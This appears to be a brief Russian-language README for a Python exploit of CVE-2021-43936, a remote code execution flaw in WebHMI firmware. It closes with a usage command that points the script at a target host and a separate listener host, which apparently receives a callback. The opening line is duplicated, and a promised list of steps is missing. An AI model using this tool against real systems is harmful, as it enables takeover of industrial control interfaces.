
CVE-2021-43936 — это критическая уязвимость (CVSS3 10.0), приводящая к удалённому выполнению кода (RCE) в прошивке WebHMI.
CVE-2021-43936 — это критическая уязвимость (CVSS3 10.0), приводящая к удалённому выполнению кода (RCE) в прошивке WebHMI.
Уязвимость работает в версии 4.0 и в самых новых версиях.
Протестировано только на 4.0.7475. Скрипт использует уязвимость в следующей последовательности действий:
Эксплойт может завершиться неудачей, если подключено более одного сетевого интерфейса (NIC). Решение — попробовать ещё раз.
python3 cve-2021-43936.py -t 10.100.23.200 -p 80 -l 10.100.23.201 -P 80
